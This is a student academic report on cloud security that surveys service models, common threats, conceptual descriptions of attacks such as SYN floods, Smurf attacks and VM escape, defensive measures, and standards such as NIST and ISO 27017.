Theme

Cloud Security

Presented by AOUIMEUR Yasmine, RESIN

Academic year

2022-2023
Contents

List of Figures ......................................................................................................... 3

Abstract ................................................................................................................. 4
1. Introduction ........................................................................................................ 4
1.1. What is Cloud Computing?.............................................................................. 5
1.2. Need of Cloud Computing .............................................................................. 5
1.3. Layers and types of services provided by Cloud Computing ............................... 7
2. Cloud Security Risks and Threats .......................................................................... 8
2.1. Common threats to cloud security................................................................... 8
3. Attacks on Cloud Security .................................................................................. 10
5. Virtualization security issues............................................................................... 13
6. Cloud Security Measures.................................................................................... 17
7. Difference between Edge Computing and Cloud Computing.................................. 20
8. Difference between Fog Computing and Cloud Computing ................................... 20
9. Common Cloud Security Standards ..................................................................... 21
10. Conclusion ...................................................................................................... 22
References ........................................................................................................... 24

2
List of Figures
Fig.1 History of cloud Computing

FIG.2 CLOUD COMPUTING FUNDAMENTAL CHARACTERISTICS

FIG.3 VARIOUS SERVICE MODEL IN THE CLOUD

3
Abstract
Cloud computing offers new opportunities for individuals and to use IT as a utility. It
uses computing power regardless of the user’s location and devices. Thus, it has
become more demanding due to its performance, high computing power, low cost,
elasticity, accessibility, evolution and availability. Cloud computing offers ubiquitous
operations with various security challenges. In this report, we will discuss security
challenges and vulnerabilities as well as the limits of current security modules.

Keywords: Cloud Computing, Cloud Security, Cloud Security Challenges.

1. Introduction

4
1.1. What is Cloud Computing?
Cloud Computing is a type of technology that provides remote services on the
internet to manage, access, and store data rather than storing it on Servers or local
drives. This technology is also known as Serverless technology. Here the data can be
anything like Image, Audio, video, documents, files, etc.

1.2. Need of Cloud Computing

Before using cloud technology, most small and big IT organizations used conventional
methods, such as storing data in servers in rooms dedicated only to that purpose i.e., a
database server, mail server, firewalls, routers, modems, high-speed devices, etc.
should all be in that server room. For that IT companies have to spend lots of money. In
order to reduce all the problems with cost Cloud computing come into existence and
most companies shift to this technology.

5
In the modern era computing has become the need of every business and individual. A
significant amount of time is spent on maintaining resources and updating hardware
and software components. It is necessary to keep things synchronized while attempting
to provide access to remote resources without requiring special devices capable of
performing all processing on the local processing unit. Cloud computing has provided a
solution to all these requests by providing computing power as a utility for every user.
Regardless of the hardware devices they use and the processing capabilities of these
machines, cloud computing provides users with high processing power based on users'
demands and requirements and charges by usage time.

Cloud users do not need to manage and update hardware and software resources
themselves. Thus, cloud computing provides a means of minimizing our computing
expenses in most cases. The shift to cloud technology allows the IT team to minimize
time spent on maintenance and focus on activities that have a greater impact.
Integration with other technologies is much easier, providing downward portability with
legacy systems. It is much more scalable and recoverable than ever as users get what
they request on their servers. It is highly customizable, providing a platform on which
they can easily deploy their system.

6
For application developers, cloud computing provides thousands of pre-built and tested
modules ready to be integrated into their new application. User data is stored in a single
repository, making it accessible remotely from anywhere in the world. The user gets
synchronized data from their personal computer, mobile devices, and anywhere via the
Internet through a browser. They can easily share their data with friends and
colleagues.

The user can always control what they need to display and what they should not display
while offering a maximum level of accessibility and availability. EC2, Google AppEngine,
SalesForce.com, SaaSGrid, and Amazon's GoGrid are some examples of cloud
computing.

1.3. Layers and types of services provided by Cloud Computing

Cloud computing can be segregated into the following service levels: Infrastructure as a
Service, Platform as a Service, and Software as a Service as shown in Fig. 2. Fig. 3
presents the separation between service models with control of cloud service provider
and customer of different underlying concepts in each model.

1. Infrastructure as a Service (IaaS): Customers will get the services for a complete
computing infrastructure over the Internet. Example: Amazon EC2 [10] and S3
[20].
2. Platform as a Service (PaaS): In PaaS, customers will get the platform for the
development of software applications. Example: Microsoft Azure [8] and Google
AppEngine [9].
3. Software as a Service (SaaS): Customers will be provided with the Software over
the Internet. In this model, users will not get the software; instead, they get the
web-based software from the service providers to the intended work. Example:
Dropbox [21] and Office365 [22]

7
2. Cloud Security Risks and Threats
2.1. Common threats to cloud security
There is no doubt that Cloud Computing provides various Advantages but there are also
some security issues in cloud computing. Below are some of these Security Issues as
follows:

• Data Loss
Data Loss is one of the issues faced in Cloud Computing. This is also known as
Data Leakage. As we know that our sensitive data is in the hands of Somebody
else, and we don’t have full control over our database. So, if the security of cloud
service is to break by hackers then it may be possible that hackers will get
access to our sensitive data or personal files.

• Interference of Hackers and Insecure API’s

As we know, if we are talking about the cloud and its services it means we are
talking about the Internet. Also, we know that the easiest way to communicate
with Cloud is using API. So it is important to protect the Interface’s and API’s
which are used by an external user. But also in cloud computing, few services
are available in the public domain which are the vulnerable part of Cloud
Computing because it may be possible that these services are accessed by some
third parties. So, it may be possible that with the help of these services hackers
8
 can easily hack or harm our data.

• User Account Hijacking

Account Hijacking is the most serious security issue in Cloud Computing. If
somehow the Account of User or an Organization is hijacked by a hacker then
the hacker has full authority to perform Unauthorized Activities.

• Changing Service Provider

Vendor lock-In is also an important Security issue in Cloud Computing. Many
organizations will face different problems while shifting from one vendor to
another. For example, An Organization wants to shift from AWS Cloud to Google
Cloud Services then they face various problems like shifting of all data, also both
cloud services have different techniques and functions, so they also face
problems regarding that. Also, it may be possible that the charges of AWS are
different from Google Cloud, etc.

• Lack of Skill
While working, shifting to another service provider, need an extra feature, how to
use a feature, etc. are the main problems caused in IT Company who doesn’t
have skilled Employees. So it requires a skilled person to work with Cloud
Computing.

• Denial of Service (DoS) attack

This type of attack occurs when the system receives too much traffic. Mostly
DoS attacks occur in large organizations such as the banking sector, government
sector, etc. When a DoS attack occurs, data is lost. So, in order to recover data,
it requires a great amount of money as well as time to handle it.

9
3. Attacks on Cloud Security
Companies know the value of cloud computing in a business environment. Day by day
new technologies have emerged, which formulate new attacks for cloud computing.
When cloud adopted new technology in cloud infrastructure, definitely new attacks
have come. There are some attacks those are launch when cloud adopt new cloud
technology. The Table 3 describes several security attacks, effects on cloud with some
solutions.

Denial of service attack Denial of service attack is a type of attack in which an attacker
sends thousand of request packet to the victim, through the Internet. The main aim of
the attacker is to exhaust all the resources of the victim. An attacker may flood a large
number of requests to waste the computational power, performance time and
cryptographic operations. This type of attack may affect the cloud actual behavior and
availability of cloud services. The attacker sends different type of packets including
Transmission Control Protocol (TCP) packet, User Datagram Protocol (UDP) packet,
and Internet Control Message Protocol (ICMP) echo request packet. An attacker
flooded numbers of TCP packet with the SYN flag set to its victim. The victim thinks that
this request are coming from a reliable user and victim make a TCP connection with the
help of three way handshake protocol with the attacker. Victim many times are

10
consuming to make connections and for each connection he reserved some spaces in
the buffer. This is the most happening attack known the SYN flood attack. In the second
type of packet, attacker send a large number of UDP packets to a non listening port on
the victim. After receiving the packet victim send ICMP respond message “Host
unreachable”. This cause victim many time consume to send response packet. In the
third type of packet, attacker sends very large number of ICMP “Echo request” packet
to the victim. In this packet’s destination IP address is a special broadcast address of
the network, while the source IP address is the address of the victim. Resulting from
them victim send “Echo reply” message from each host on its network. This type of
attack is referred as a Smurf attack. Another type of attack known as the DDoS attack.
A distributed DoS attack is much more complex and harder to detect compared to a
DoS attack. In a DDoS attack, the attacker called a controller, first scan the whole
network and list out all the defenceless hosts called handlers and settlement with. Each
handler creates or recruit many agents called zombies to launch the attack.

Service injection attack Cloud system provides the services to its user. When a user
wants to access a service first he sends a request to the cloud and cloud system is
responsible for providing free to use the resources of the requested service. The new
allocated resource to a requested user may be assigned to the other requesting user at
some later point of time. An attacker makes a new malicious image of the assigned
resource and every time he tries to inject the malicious resource, service or new virtual
machine into the cloud environment. When a legitimate user request for a service the
malicious service serve as a cloud service. This may affect the cloud actual
functionalities. To protect this type of attack a service integrity module should be
implemented.

Attack on virtualization The virtualization attack in the cloud are performed two
different types first is VM escape and another is rootkit in hypervisor. In virtualization
attack, control of the virtual machine in the virtual environment will be captured. Zero
day attack is one of the method. Another attack includes backdoor channel attack, VMs
modification, storage allocation and multi-tenancy.

11
User to root attack In this attack, the attacker on intruder acquires limitless access to
the whole system by seizing the account and password of an authorized user. This type
of attack is executed through overflowed data in which excessive data sent to a
statically defined buffer.

Port scanning Port scanning is used to identify open, closed and filtered parts of a
system. In port scanning, intruders use open ports like services, IP and MAC address
that belong to a connection to seize information. The most common port scanning
attack includes TCP, UDP, SYN/FIN/ACK and window scanning. The actual attack is
executed by attackers after scanning the port.

Man-in-the-middle attack The man-in-the-middle attack refers an attack in which an

attacker is active in the middle and access the data those are passed between two
parties. This attack is possible due to lack of security configuration in a Secure Socket
Layer (SSL). The two parties, including providers communicate with each other in the
cloud, at this time an attacker is residing in the middle and capable to access the data,
if communication channel are not secure.

Metadata spoofing attack The service functionality and detail are stored in the WSDL
file. In this type of attack, an attacker wants to access this type of file and perform
modification or deletion operation on the file. For accessing the file attacker wait until
service delivery time and at the delivery time he succeeds to interrupt the service
invocation code in the WSDL file. The solution of this attack information about service
functionality and other details should be kept in encrypted form. Strong authentication
should be required to access this type of file.

Phishing attack Phishing attack is performed for manipulating a web link. Resulting
from the attack a legitimate user is redirected to a fake web page and he thinks the
open web page is a secure page and he enter his credentials (user-name and
password). After that, the attacker can access his credentials.

Backdoor channel attack The backdoor channel attack permits the attackers to access
remote computer program that control the victim resources. It is a passive attack. A
programmer may sometimes deploy zombies so, that the zombies can be performed
12
DDoS attack. However, attackers often use back doors channels for control the victim
resources. It can breach the privacy and confidentiality of the data.

5. Virtualization security issues

The reason behind the wide adoption of cloud computing in the industry is the
virtualized cloud computing. Development of cloud service for business purpose, cloud
provider require trust on VM. In the cloud environments, the virtualization is the primary
requirements of any service. The multi-tenancy and virtualization concept provides
more profit, but this concept is not free from threats and attacks. Many attacker
perform co-location attack to access the services. Day by day people do research in this
field to achieve proper logical and virtual isolation. The virtualization software is used to
create virtualized services and images, contain several types of virus that may damage
or break the virtualized code.

13
• VMs image management The dynamic nature of the cloud allows the provider to
create, modify and copy VM images. This is possible due to the service oriented
and elasticity features of the cloud. The cloud environment are a volatile
environment, according to the situation the state will change. This feature can
bring new issues in the cloud. The VM images are kept in the database
repository. They can be easily turned off, on or suspended and save their current
working state. The dynamic nature allows to user to create her own VM images
or use a previously created image. One possible workaround for VM is a
malicious user can upload the corrupted images that contain malware, in the
repository or can find the code of the image to look for probable attack point.
However, this can bring several issues in the cloud. The risk included hosting,
distributing and manage VM images. On the other hand the malicious VM image
observes the user activity or data resulting from them data theft or breach the
user privacy. If the VM image is not properly managed then it create more
serious harm to the system in the form of exposing the user confidentiality. The
improper management of the VM can break the administrator password or
decrease the efficiency of the VM in the form of VM sprawl. It is a situation where
the numbers of VMs are continuously increasing on the host system, but

14
 previously installed VMs are in an idle state. This situation can lead resource
wasted on the host machine and make complicated VMs management.
• Virtual machine monitor (VMM) The VMMs is well known term in the
virtualization that are not germ free. It is a software component regulate all the
virtual machines and their connection with the hardware. The core responsibility
of the VMM is the management and isolation of each running VMs. The VMM is
also responsible for the creation and management of each virtual resources. The
paper [126] discuss the hypervisor vulnerabilities, along with breaking the
security of the Xen and KVM. The interconnection complexities and more entry
point in the VMM can promote a large number of attack vectors. The guest user
required to trust on the underlying virtual hardware and VMMs. On the VMM,
VMM-based rootkits attacks are possible due to the transparency of the VMM.
The attack can compromise the trust model, which identify the single point of
failure or malicious users on the VMM. The lack of monotonicity is another
security issue in the VMM due to wrong or non linear execution path of the VMs.
This issue can break the linear program execution running within the virtual
machine. For example, restoring the VM or some snapshots can lose the
database information, log files, monitoring data, and application setting. The
separation of data from the snapshoting process can also create a security issue
of data storage. The isolation, interposition, and inspection are three concerning
areas in the VMMs. An attack named VM escape is referring to a situation in
which the control of the VMM or hypervisor is under the attacker. The attacker
can monitor other virtual machines, access the shared infrastructure, monitor
the CPU utilization or can bring the VMM shutting down. Such attacks include
BLUEPILL [19], SubVirt and Direct Kernel Structure Manipulation (DKSM). The
computational overhead on the VMM, VM diversity, execute malicious code, and
zero day vulnerabilities are some other concerning issues yet not to be solved.
• Network virtualization In a real scenario, the management of physical Ethernet
networks or radio networks are hard due to abundant interruption or anomalies.
The traffic in the networks can produce security issues. In the virtualized
network layer due to high traffic the tried-and-tested network security solutions
might not work. When people move to virtualized network in the cloud

15
 environment the security of such network are down. In the virtual infrastructure
the security of the Virtual Local Area Networks (VLANs) and firewalls are
reduced. Many security provider provides their security service in the
virtualization form. For example, Cisco Virtual Security Gateway for Nexus 1000
V series switch used as a virtual appliance on VMware. The paper [174]
discusses the network performance of Amazon EC2 due to virtualization. They
presents the reason for the unstable network characteristic, abnormal packet
delay, and unstable TCP and UDP throughput. Such abnormal nature of the
network brings network holes named network tailoring and limited administrative
access issue in the cloud. The above security issue and loopholes promote the
attacker to attack on a sensitive portion of the virtual infrastructure and might be
access the sensitive information related to users or providers. Amazon EC2
provides their virtual machines to publicly access through a unique identifier
named IP address of the user. The bridged adapter is responsible for sending,
receiving and listening of incoming and outgoing network packets from the host.
For checking firewalls rules, Network Address translation (NAT) modifications,
and checking MAC address the bridged adapter takes some time. The above
scenario creates an issue named promiscuous mode where running VM checks
all the network packets that are not addressed to them. Another security issue
such as packet sniffing, spoofing, and network based VM attack present in the
virtualized networking.
• Mobility The VM cloning or template image cloning is a process of coping or
moved VM into other servers. This can be sometimes create a problem because
several running VMs copies of the same images and they trust on same software
and initial state. This copying process propagates several errors,
misconfiguration or even worst. During the copying of images contains secret
key and other private information of the owner, that to be leaked to another VM.
There are multiple copies of VM across the network. If an attacker takes one
copy of the VM and perform attacks, it might be possible that the attacker can
read the data and break the administrative password. The mobility of the VM
provides the facility for quick development of VM images. This can also bring

16
 new security issues and challenges. So, people required to concern all security
issues during transfer time.

6. Cloud Security Measures

Cloud security has evolved with the adoption of Cloud Computing. The concept of
cloud security is becoming more and more critical with the adoption of cloud services
by more users. With many of the users around the world, if the cloud services are not
protected adequately, it leaves vast amounts of customers data vulnerable to attackers
from all over the worlds. Cloud security can be achieved in several forms, protection
against the Network attacks, Software attacks, Intrusion Detection, Access control,
Analysis of abnormal behavior, Analysis of Virus, Analysis of Malware, Analysis of

17
Trojans and so on. Security measures, which ensures cloud security are presented
below:

a. Password : To secure the cloud services from simple attacks against the access
controls, users are encouraged to use a unique password for accessing the cloud-
based services. Customers should not use simple passwords or reuse the
password which has been used on some other services over the Internet. Cloud
service providers should make sure that there is no direct relation to user names
and passwords stored in their database. In case there is a breach on the cloud
service provider, it makes it hard for attackers to match the user names to
passwords [29].
b. Access Recovery : Customers should use confidential details or questions, for
recovering their access control to the cloud in case they forgot their password.
This information can be used to recover access to the Cloud. Users should not
use the information which can be gained by using social engineering or just
checking some information on their social networking profiles. As most of the
personal details are posted on the networking websites. Using such information,
attackers can easily gain access to the Cloud without knowing the person.
c. Encryption : Using a good encryption technique by cloud service providers
always protects the customer’s data, such as Homomorphic Encryption. Usage of
a homomorphic encryption technique is still not completely feasible in real time
scenarios [30].
d. Password Management: As discussed in the first point, users should not reuse
their passwords, and cloud service providers should encourage them to use
strong passwords with special characters, symbol, alphabets, and numbers. It is
tough for users to remember all of their usernames and passwords. They need to
have a proper management tool for storing their usernames and passwords to
protect them from anyone getting access to them [31].
e. Multi-factor authentication : Multi-factor authentication adds an extra layer of
security to the traditional approach to access the Cloud services instead of user
name and password. To access the cloud services using multi-factor
authentication, customers need to have two or more factors to access the cloud

18
 services to authenticate them as a genuine user of the Cloud. These factors can
be based on anything such as knowledge (something known to the user, such as
an other password), something user has (Biometric features), and something user
possesses (RSA key or USB based keys or random text sent to their mobile) [32].
Cloud services providers should support multi-factor authentication methods and
encourage the customers to use the multi-factor authentication instead of using
simple authentication using user name and password. In this way, it will be easy
to defend against unauthorized access to customers data even if someone has
customers credentials; they wont be having access to other factors.
f. Login Monitor : Cloud service providers and customers need to monitor recent
devices used to access cloud services. Based on that information users can
identify if someone has logged in with their credentials and change their
passwords in case of a suspicious login from unknown devices or locations.
Cloud service providers need to improve the login statistics with proper details
for all the devices connected to access the Cloud Services for all the customers
[33].
g. Personal Devices : Customers should be careful where they are logging in to
cloud to access the services. They should avoid using someone else device, as
they might have key loggers (a program which saves all the keys pressed on a
device, while the program is running). In those devices, if they have such
applications, attackers will gain user credential for the Cloud compromising
security for customers [34].
h. Virus, Malware, and Trojans : Customers should have good anti-virus and anti-
spyware applications on their devices. If they dont have proper protection of
their devices, which they use to use the cloud services might have some viruses
or malware which store the user credentials and gain access to the cloud services
leaving their personal and confidential details into the unauthorized persons or
attackers. It would be a good habit for users to have good anti-virus and anti-
spyware applications to protect their personal devices [35].

19
7. Difference between Edge Computing and Cloud
Computing
Edge Computing and Cloud Computing are the two paradigms in this modern digital
world. Both are the growing paradigms for storing data on Cloud. In the table 1.1 below
the fundamental difference between them.

8. Difference between Fog Computing and Cloud

Computing
Cloud Computing: The delivery of on-demand computing services is known as cloud
computing. We can use applications to storage and processing power over the internet.
It is a pay as you go service. Without owning any computing infrastructure or any data
centers, anyone can rent access to anything from applications to storage from a cloud
service provider.
We can avoid the complexity of owning and maintaining infrastructure by using cloud
computing services and pay for what we use.
In turn, cloud computing services providers can benefit from significant economies of
scale by delivering the same services to a wide range of customers.

20
Fog Computing: Fog computing is a decentralized computing infrastructure or process
in which computing resources are located between the data source and the cloud or any
other data center. Fog computing is a paradigm that provides services to user requests
at the edge networks. The devices at the fog layer usually perform operations related to
networking such as routers, gateways, bridges, and hubs. Researchers envision these
devices to be capable of performing both computational and networking operations,
simultaneously. Although these devices are resource-constrained compared to the cloud
servers, the geological spread and the decentralized nature help in offering reliable
services with coverage over a wide area. Fog computing is the physical location of the
devices, which are much closer to the users than the cloud servers.

9. Common Cloud Security Standards

1. NIST (National Institute of Standards and Technology)

NIST is a federal organization in the US that creates metrics and standards to boost
competition in the scientific and technology industries. The National Institute of
Regulations and Technology (NIST) developed the Cybersecurity Framework to comply
with US regulations such as the Federal Information Security Management Act and the
Health Insurance Portability and Accountability Act (HIPAA) (FISMA). NIST places a
strong emphasis on classifying assets according to their commercial value and
adequately protecting them.

2. ISO-27017

A development of ISO-27001 that includes provisions unique to cloud-based

information security. Along with ISO-27001 compliance, ISO-27017 compliance should
be taken into account. This standard has not yet been introduced to the marketplace. It
attempts to offer further direction in the cloud computing information security field. Its
purpose is to supplement the advice provided in ISO/IEC 27002 and various other
ISO27k standards, such as ISO/IEC 27018 on the privacy implications of cloud
computing, and ISO/IEC 27031 on business continuity.

21
3. CIS controls

Organizations can secure their systems with the help of Internet Security Center (CIS)
Controls, which are open-source policies based on consensus. Each check is rigorously
reviewed by a number of professionals before a conclusion is reached.
To easily access a list of evaluations for cloud security, consult the CIS Benchmarks
customized for particular cloud service providers. For instance, you can use the CIS-
AWS controls, a set of controls created especially for workloads using Amazon Web
Services (AWS).

4. FISMA

In accordance with the Federal Information Security Management Act (FISMA), all
federal agencies and their contractors are required to safeguard information systems
and assets. NIST, using NIST SP 800-53, was given authority under FISMA to define the
framework security standards (see definition below).

10. Conclusion
Every new technology has its pros and cons, similar is the case with cloud computing.
Cloud computing provides the benefit of quick deployment, cost efficiency, large
storage space and easy access to the system anytime and anywhere. So, the cloud
computing is very much evident rapidly emerged technology and widely accepted
computing environment around the world. However, there are many security and
privacy concerns that obstacle to adoption of the cloud computing. All the cloud users
should be well aware of the vulnerabilities, threats and attacks existing in the cloud. The
awareness of security threats and attacks will help the organizations to carry out fast
rate adoption of the cloud.

22
23
References
1. journal-of-network-and-computer-application Volume 79, 1 February 2017, Pages 88-115 Cloud security issues and challenges: A survey

2. Cloud Computing: History and Overview. IEEE Jayachander Surbiryala Department of Electrical Engineering and Computer Science,
University of Stavanger, Stavanger, Norway,Chunming Rong

3. [8] Microsoft, “Windows azure.” http://www.microsoft.com/azure. [Online; accessed 31-Jan-2019].

4. [9] Google, “Google app engine.” http://code.google.com/appengine. [Online; accessed 31-Jan-2019].
5. [10] Amazon, “Amazon elastic computing cloud.” http://aws.amazon.com/ ec2. [Online; accessed 31-Jan-2019].
6. [20] Amazon, “Amazon web services.” http://s3.amazonaws.com. [Online; accessed 31-Jan-2019].
7. [21] I. Dropbox, “Dropbox,” http://www.dropbox.com. [Online; accessed 31- Jan-2019].
8. [22] Microsoft, “Office365: Documents and outlook,” [Online; accessed 31- Jan-2019].
9. Cloud security issues and challenges: a survey Ashish Singh, Kakali Chatterjee.
10.Asian Journal of Advances in Research. DATA SECURITY IN CLOUD: A REVIEW
11. Cloud Security For Dummies.
12.GeeksForGeeks,Cloud Computing.

24